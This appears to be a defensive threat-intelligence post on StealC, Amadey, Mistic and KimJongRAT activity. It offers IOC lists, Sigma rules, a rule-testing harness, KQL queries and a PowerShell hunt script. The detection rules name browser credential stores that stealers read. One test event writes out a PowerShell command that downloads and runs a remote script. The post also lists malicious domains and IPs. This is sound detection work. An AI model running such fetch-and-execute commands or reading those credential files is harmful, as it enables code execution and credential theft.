StealC, Amadey, and Mistic: Multi-Vector Infostealer & Access Broker Surge — OTX Pulse Analysis

Security Arsenal Team
June 27, 2026
5 min read

Recent OTX pulses reveal a coordinated surge in infostealer and initial access broker (IAB) activity targeting enterprise credentials and session tokens. The intelligence highlights a convergence of Malware-as-a-Service (MaaS) families like StealC and Amadey, advanced backdoors like Mistic (linked to the Woodgnat IAB), and persistent APT activity from Kimsuky using KimJongRAT. Despite the disruption of Amadey and Stealc infrastructure via Operation Endgame, actors are rapidly pivoting to new domains and IPs. The primary objective across these campaigns is credential harvesting (cookies, passwords, crypto-wallets) to facilitate downstream ransomware operations or financial fraud.

Threat Actor / Malware Profile

StealC & Amadey

  • Type: Infostealer / Loader (MaaS)
  • Distribution: Phishing attachments, malicious SEO, fake software updates.
  • Behavior: StealC (C++) harvests data from browsers, crypto-wallets, and messaging apps. It acts as a secondary loader. Amadey is a modular botnet known for downloading third-party payloads.
  • C2 Communication: HTTP/HTTPS POST requests to specific domain paths (e.g., /ms/index.php).

Mistic & Woodgnat

  • Type: Backdoor / Initial Access Broker
  • Actor: Woodgnat (associated with Qilin, Black Basta ransomware).
  • Distribution: Social engineering and sideloading.
  • Behavior: Mistic is a stealthy backdoor deployed via DLL sideloading. It establishes persistence and facilitates lateral movement for ransomware deployment.

KimJongRAT

  • Type: RAT / Infostealer
  • Actor: Kimsuky (North Korean APT).
  • Distribution: Phishing emails with shortened URLs pointing to GitHub Releases hosting malicious ZIPs.
  • Behavior: Combines information stealing with remote access. Uses the "LOTS" (Living Off The Land Sites) technique for C2.

IOC Analysis

The provided pulses contain a mix of network and file-based indicators:

  • Domains & URLs: Several indicators utilize typosquatting (e.g., microsoft-telemetry.at) or suspicious top-level domains to mimic legitimate services. URLs often point to PHP gateways for C2 communication.
  • IP Addresses: Infrastructure IPs (e.g., 176.124.199.207) act as direct C2 servers. Operation Endgame has disrupted many, but active IPs remain dangerous.
  • File Hashes: SHA256 hashes are provided for payload executables and loaders.

Operationalization: SOC teams should immediately ingest these IOCs into EDR blocklists and SIEM correlation engines. Domains should be blocked at the perimeter (DNS sinkhole). File hashes should be used to scour endpoints for historical presence. Tools like Cortex XSOAR, Splunk, or Microsoft Sentinel can automate the hunting process.
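Before any of the indicators above go into a blocklist, they need to be typed and normalized: a raw pulse export mixes domains, IPs, URLs and hashes of different lengths, and one hash in this page's list is 40 hex characters (a SHA1) rather than a SHA256, so a SHA256-only match would silently never fire on it. The following Python is an added example, not code from the pulses or from Security Arsenal: it buckets a constructed indicator dump (domain, IP, path and hash values taken from this page; the full URL form is constructed) into typed lists and then hunts a few constructed proxy log lines against them. It also flags POSTs to the `/ms/index.php` gateway path on hosts that are not yet listed, which is how pivoted infrastructure that reuses the same panel path can be caught; the log format and the `198.51.100.7` documentation-range address are assumptions for the sample.

```python
"""Normalize a mixed OTX-style indicator dump into typed blocklists, then hunt a few
constructed proxy log lines against them."""
import ipaddress
import re
from urllib.parse import urlparse

# Constructed: an untyped IOC dump as pasted from a pulse. Domain, IP, path and hash
# values are the ones this page lists; the full URL form is constructed for illustration.
RAW_IOCS = [
    "microsoft-telemetry.at",
    "svclsc.com",
    "teamicrosoft.com",
    "176.124.199.207",
    "176.111.174.140",
    "8cef760d11d24fc2e9bbd9f770dca5105854f7ece3b0e6948d7c8b7fdd1765ea",
    "ff8d2afd9d7f0a828592fee34ca55d1a3542f7ed",   # 40 hex chars: a SHA1, not a SHA256
    "http://authorized-logins.net/ms/index.php",  # the page's C2 gateway path on a listed domain
]

# Gateway path named on the page; used to catch new infrastructure that reuses the same panel path.
C2_PATHS = {"/ms/index.php"}

HASH_TYPES = {32: "md5", 40: "sha1", 64: "sha256"}
DOMAIN_RE = re.compile(r"^([a-z0-9-]{1,63}\.)+[a-z]{2,63}$")


def classify(raw):
    """Return (ioc_type, normalized_value); hashes are typed by length so a SHA1 never
    lands in a SHA256 match list."""
    v = raw.strip().lower().rstrip(".")
    if re.fullmatch(r"[0-9a-f]+", v) and len(v) in HASH_TYPES:
        return HASH_TYPES[len(v)], v
    try:
        return "ip", str(ipaddress.ip_address(v))
    except ValueError:
        pass
    if "://" in v:
        u = urlparse(v)
        if u.hostname:
            return "url", u.hostname + (u.path or "/")
    if DOMAIN_RE.match(v):
        return "domain", v
    return "unknown", raw


def build_blocklists(raw_iocs):
    """Bucket indicators by type; a URL indicator also contributes its host to the domain list."""
    lists = {k: set() for k in ("domain", "ip", "url", "sha256", "sha1", "md5", "unknown")}
    for raw in raw_iocs:
        kind, value = classify(raw)
        lists[kind].add(value)
        if kind == "url":
            lists["domain"].add(value.split("/", 1)[0])
    return lists


# Constructed proxy log lines: "<timestamp> <client_ip> <method> <url> <status>".
# 198.51.100.7 is a documentation-range address standing in for a pivoted, not-yet-listed C2 host.
SAMPLE_PROXY_LOG = """\
2026-06-27T09:01:12Z 10.0.5.21 GET https://www.example.com/ 200
2026-06-27T09:02:40Z 10.0.5.21 POST http://authorized-logins.net/ms/index.php 200
2026-06-27T09:03:05Z 10.0.5.33 POST http://176.124.199.207/ms/index.php 200
2026-06-27T09:04:18Z 10.0.5.40 GET https://teamicrosoft.com/update.bin 404
2026-06-27T09:05:00Z 10.0.5.40 POST https://svclsc.com/ms/index.php 200
2026-06-27T09:06:31Z 10.0.5.52 POST http://198.51.100.7/ms/index.php 200
"""


def hunt_proxy_log(log_text, lists, c2_paths=C2_PATHS):
    """Return (client, url, reason) for every line that hits a listed IP, URL or domain,
    or that POSTs to a known C2 gateway path on an unlisted host."""
    hits = []
    for line in log_text.splitlines():
        _ts, client, method, url, _status = line.split()
        u = urlparse(url)
        host = (u.hostname or "").lower()
        path = u.path or "/"
        if host in lists["ip"]:
            hits.append((client, url, "c2-ip"))
        elif host + path in lists["url"]:
            hits.append((client, url, "c2-url"))
        elif host in lists["domain"]:
            hits.append((client, url, "domain"))
        elif method == "POST" and path in c2_paths:
            hits.append((client, url, "c2-path"))
    return hits


if __name__ == "__main__":
    blocklists = build_blocklists(RAW_IOCS)
    for kind, values in blocklists.items():
        print(f"{kind:8s} {len(values)} indicator(s)")
    for client, url, reason in hunt_proxy_log(SAMPLE_PROXY_LOG, blocklists):
        print(f"HIT [{reason}] {client} -> {url}")
```

The typed buckets map directly onto the destinations named above: `domain` to the DNS sinkhole and web gateway, `ip` to the perimeter firewall, `sha256` and `sha1` to separate EDR hash lists. The `c2-path` rule is the lowest-confidence of the four and is there for hunting rather than blocking; an allowlist of internal hosts serving a `/ms/index.php` path, if any exist, should be checked before it is turned into an alert.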

Detection Engineering

```yaml
---
title: Potential StealC or Amadey Infostealer Activity
date: 2026/06/27
status: experimental
description: Detects behavior consistent with StealC or Amadey infostealers accessing browser credential files.
references:
    - https://www.microsoft.com/en-us/security/blog/2026/06/24/stealc-and-amadey-breaking-down-infostealers-and-the-cybercrime-services-that-deliver-them/
author: Security Arsenal
logsource:
    category: file_access
    product: windows
detection:
    selection:
        TargetFilename|contains:
            - '\Google\Chrome\User Data\Default\Login Data'
            - '\AppData\Local\Google\Chrome\User Data\Default\Cookies'
            - '\AppData\Roaming\Mozilla\Firefox\Profiles\'
            - '\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data'
    filter_legitimate:
        Image|endswith:
            - '\chrome.exe'
            - '\firefox.exe'
            - '\brave.exe'
    condition: selection and not filter_legitimate
falsepositives:
    - Legitimate password managers accessing browser stores
level: high
---
title: Suspicious DLL Sideloading via Rundll32 (Mistic Backdoor)
date: 2026/06/27
status: experimental
description: Detects potential sideloading technique used by Mistic backdoor where rundll32.exe loads a DLL from a suspicious directory.
references:
    - https://www.security.com/threat-intelligence/new-mistic-backdoor-modelorat
author: Security Arsenal
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\rundll32.exe'
        CommandLine|contains: '.dll'
    filter_paths:
        CommandLine|contains:
            - 'C:\Windows\System32\'
            - 'C:\Windows\SysWOW64\'
    condition: selection and not filter_paths
falsepositives:
    - Legitimate software installers
level: high
---
title: Suspicious PowerShell Download from GitHub (Kimsuky/JINX-0164)
date: 2026/06/27
status: experimental
description: Detects PowerShell scripts downloading content from GitHub, a tactic used by Kimsuky (LOTS) and JINX-0164.
references:
    - https://sect.iij.ad.jp/blog/2026/06/continuous-evolution-of-kimjongrat-2026/
author: Security Arsenal
logsource:
    category: process_creation
    product: windows
detection:
    selection_pwsh:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
    selection_cmd:
        CommandLine|contains:
            - 'Invoke-WebRequest'
            - 'IEX'
            - 'DownloadString'
    selection_github:
        CommandLine|contains:
            - 'github.com'
            - 'githubusercontent.com'
    condition: all of selection_*
falsepositives:
    - Developers using PowerShell scripts to manage GitHub repos
level: medium
```
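A rule's selection/filter logic is easiest to reason about when it is run against a handful of positive and negative events before it is deployed. The Python below is an added test harness, not part of the original page or of the Sigma project: it restates the three detection blocks above as dictionaries, implements only the `contains`, `endswith` and `startswith` modifiers those rules use (case-insensitive, as Sigma string matching is by default), and evaluates six constructed events. The process paths, user name and URLs in the events are illustrative assumptions.

```python
"""Run the three Sigma rules above against constructed events to confirm that each
selection/filter combination fires where intended and stays quiet where it should."""

# Detection blocks restated from the YAML above. Conditions are callables over the
# per-selection results. Only the modifiers the rules use are supported; this is a
# test harness, not a Sigma engine.
RULES = {
    "stealc_amadey_browser_files": {
        "logsource": {"category": "file_access"},
        "detection": {
            "selection": {"TargetFilename|contains": [
                "\\Google\\Chrome\\User Data\\Default\\Login Data",
                "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies",
                "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\",
                "\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data",
            ]},
            "filter_legitimate": {"Image|endswith": ["\\chrome.exe", "\\firefox.exe", "\\brave.exe"]},
        },
        "condition": lambda r: r["selection"] and not r["filter_legitimate"],
    },
    "mistic_rundll32_sideload": {
        "logsource": {"category": "process_creation"},
        "detection": {
            "selection": {"Image|endswith": "\\rundll32.exe", "CommandLine|contains": ".dll"},
            "filter_paths": {"CommandLine|contains": ["C:\\Windows\\System32\\", "C:\\Windows\\SysWOW64\\"]},
        },
        "condition": lambda r: r["selection"] and not r["filter_paths"],
    },
    "kimsuky_github_download": {
        "logsource": {"category": "process_creation"},
        "detection": {
            "selection_pwsh": {"Image|endswith": ["\\powershell.exe", "\\pwsh.exe"]},
            "selection_cmd": {"CommandLine|contains": ["Invoke-WebRequest", "IEX", "DownloadString"]},
            "selection_github": {"CommandLine|contains": ["github.com", "githubusercontent.com"]},
        },
        "condition": lambda r: all(v for k, v in r.items() if k.startswith("selection_")),
    },
}


def field_match(event, key, patterns):
    """One 'Field|modifier' entry; a list of patterns is an OR. Case-insensitive."""
    field, _, modifier = key.partition("|")
    value = str(event.get(field, "")).lower()
    if isinstance(patterns, str):
        patterns = [patterns]
    for p in (p.lower() for p in patterns):
        if modifier == "contains" and p in value:
            return True
        if modifier == "endswith" and value.endswith(p):
            return True
        if modifier == "startswith" and value.startswith(p):
            return True
        if modifier == "" and value == p:
            return True
    return False


def selection_match(event, selection):
    """Every field entry inside one selection must match (AND)."""
    return all(field_match(event, k, v) for k, v in selection.items())


def evaluate(rule, event):
    """True when the event belongs to the rule's logsource and satisfies its condition."""
    if event.get("category") != rule["logsource"]["category"]:
        return False
    results = {name: selection_match(event, sel) for name, sel in rule["detection"].items()}
    return bool(rule["condition"](results))


# Constructed events; paths, user name and URLs are illustrative.
LOGIN_DATA = "C:\\Users\\bob\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
EVENTS = [
    {"id": "E1", "category": "file_access", "TargetFilename": LOGIN_DATA,
     "Image": "C:\\Users\\bob\\AppData\\Local\\Temp\\setup_update.exe"},          # should fire
    {"id": "E2", "category": "file_access", "TargetFilename": LOGIN_DATA,
     "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"},   # browser itself: filtered
    {"id": "E3", "category": "process_creation", "Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32.exe C:\\Users\\bob\\AppData\\Roaming\\Vendor\\helper.dll,Start"},  # user-writable DLL
    {"id": "E4", "category": "process_creation", "Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL"},          # system DLL: filtered
    {"id": "E5", "category": "process_creation",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -nop -c \"IEX (Invoke-WebRequest https://raw.githubusercontent.com/example/repo/main/run.ps1)\""},
    {"id": "E6", "category": "process_creation", "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
     "CommandLine": "pwsh.exe -c Invoke-WebRequest https://api.github.com/repos/example/repo/releases"},  # developer FP
]


def run_rules(events, rules=RULES):
    """Map each event id to the list of rule names that fired on it."""
    return {e["id"]: [name for name, rule in rules.items() if evaluate(rule, e)] for e in events}


if __name__ == "__main__":
    for event_id, fired in run_rules(EVENTS).items():
        print(event_id, fired or "-")
```

E6 fires on the GitHub rule by design: it is exactly the developer false positive the rule's `falsepositives` entry documents, which is why that rule ships at `level: medium` and why a filter on developer workstation hostnames or a known-good script allowlist is usually added before the rule is promoted to alerting.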


```kql
// Hunt for specific IOCs in Network Events (run each query separately)
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any (
    "microsoft-telemetry.at",
    "svclsc.com",
    "goodpanelforgoodjob.com",
    "authorized-logins.net",
    "mueleer.com",
    "driver-updater.net",
    "teamicrosoft.com",
    "live.ong",
    "corpsecs.com",
    "servequake.com"
    )
    or RemoteIP in ("176.124.199.207", "176.111.174.140", "62.60.226.159", "94.154.35.25", "64.188.91.237", "196.251.107.130", "104.200.67.46", "89.36.224.5")
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemoteIP, RemotePort

// Hunt for malicious file hashes. One pulse indicator (ff8d2afd...) is a 40-character SHA1,
// not a SHA256, so it is matched against the SHA1 column or it would never hit.
DeviceFileEvents
| where Timestamp > ago(7d)
| where SHA256 in (
    "8cef760d11d24fc2e9bbd9f770dca5105854f7ece3b0e6948d7c8b7fdd1765ea",
    "3f797a639bc855bc6d5471f327924b62d10900ddec49b970eca6604142bbb4be",
    "b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17",
    "9758e76b601798a30d903bf05052a53df80451e5c156548ce9da828f608b6470",
    "221a39856b37e3c682f62427f1e6b965b36a2405764689c914672770a01a1fa9"
    )
    or SHA1 in ("ff8d2afd9d7f0a828592fee34ca55d1a3542f7ed")
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, SHA1, InitiatingProcessAccountName
```


```powershell
# IOC Hunt Script - StealC, Amadey, Mistic, KimJongRAT
# Requires Administrator privileges

# SHA256 hashes from the pulses
$MaliciousSHA256 = @(
    "8cef760d11d24fc2e9bbd9f770dca5105854f7ece3b0e6948d7c8b7fdd1765ea",
    "3f797a639bc855bc6d5471f327924b62d10900ddec49b970eca6604142bbb4be",
    "b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17",
    "9758e76b601798a30d903bf05052a53df80451e5c156548ce9da828f608b6470",
    "221a39856b37e3c682f62427f1e6b965b36a2405764689c914672770a01a1fa9"
)
# One pulse indicator is a 40-character SHA1, so it is matched separately
$MaliciousSHA1 = @(
    "ff8d2afd9d7f0a828592fee34ca55d1a3542f7ed"
)

$MaliciousDomains = @(
    "microsoft-telemetry.at",
    "svclsc.com",
    "goodpanelforgoodjob.com",
    "authorized-logins.net",
    "mueleer.com",
    "grande-luna.top",
    "oeannon.com",
    "thomphon.com",
    "human-check.top",
    "update-fall.com",
    "driver-updater.net",
    "teamicrosoft.com",
    "live.ong",
    "corpsecs.com"
)

$C2IPs = @("176.124.199.207", "176.111.174.140", "62.60.226.159", "94.154.35.25", "64.188.91.237", "196.251.107.130", "104.200.67.46", "89.36.224.5")

Write-Host "[+] Checking hosts file and DNS client cache for malicious domains..." -ForegroundColor Cyan
$HostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
$HostsContent = if (Test-Path $HostsPath) { Get-Content $HostsPath } else { @() }
$DnsCache = Get-DnsClientCache -ErrorAction SilentlyContinue
foreach ($Domain in $MaliciousDomains) {
    # Escape the domain so the dots are matched literally rather than as regex wildcards
    $Pattern = [regex]::Escape($Domain)
    if ($HostsContent -match $Pattern) {
        Write-Host "[!] ALERT: $Domain found in hosts file!" -ForegroundColor Red
    }
    if ($DnsCache | Where-Object { $_.Entry -match "(^|\.)$Pattern$" }) {
        Write-Host "[!] ALERT: $Domain present in DNS client cache (recently resolved on this host)" -ForegroundColor Red
    }
}

Write-Host "[+] Checking active network connections for C2 IPs..." -ForegroundColor Cyan
$Connections = Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue
foreach ($Conn in ($Connections | Where-Object { $C2IPs -contains $_.RemoteAddress })) {
    $Proc = Get-Process -Id $Conn.OwningProcess -ErrorAction SilentlyContinue
    Write-Host "[!] ALERT: Active connection to C2 IP $($Conn.RemoteAddress):$($Conn.RemotePort) from PID $($Conn.OwningProcess) ($($Proc.ProcessName)) $($Proc.Path)" -ForegroundColor Red
}

Write-Host "[+] Hashing recently written executables in user-writable paths (this can take a while)..." -ForegroundColor Cyan
$ScanRoots = @("$env:SystemDrive\Users", "$env:ProgramData", "$env:SystemRoot\Temp")
$Candidates = Get-ChildItem -Path $ScanRoots -Recurse -File -Include *.exe, *.dll, *.zip -ErrorAction SilentlyContinue |
    Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-30) }
foreach ($File in $Candidates) {
    $Sha256 = (Get-FileHash -Path $File.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
    if ($Sha256 -and $MaliciousSHA256 -contains $Sha256.ToLower()) {
        Write-Host "[!] ALERT: Known malicious SHA256 at $($File.FullName)" -ForegroundColor Red
        continue
    }
    $Sha1 = (Get-FileHash -Path $File.FullName -Algorithm SHA1 -ErrorAction SilentlyContinue).Hash
    if ($Sha1 -and $MaliciousSHA1 -contains $Sha1.ToLower()) {
        Write-Host "[!] ALERT: Known malicious SHA1 at $($File.FullName)" -ForegroundColor Red
    }
}

Write-Host "[+] Scan complete." -ForegroundColor Green
```


Response Priorities

Immediate

  • Block IOCs: Push all domain and IP indicators to perimeter firewalls, Secure Web Gateways, and DNS sinkholes.
  • Hunt for Execution: Run the provided PowerShell script across the fleet to identify active connections to C2 infrastructure (specifically Amadey and Stealc IPs).

24h

  • Identity Verification: Given the prevalence of infostealers (StealC, Lumma, RedLine) harvesting session tokens, enforce re-authentication for all users and revoke active sessions. Reset passwords for accounts suspected of compromise.

1 Week

  • Architecture Hardening: Implement application controls to prevent unauthorized sideloading (Mistic backdoor vector) and restrict access to GitHub/raw content from non-development workstations to mitigate LOTS-based attacks (KimJongRAT).
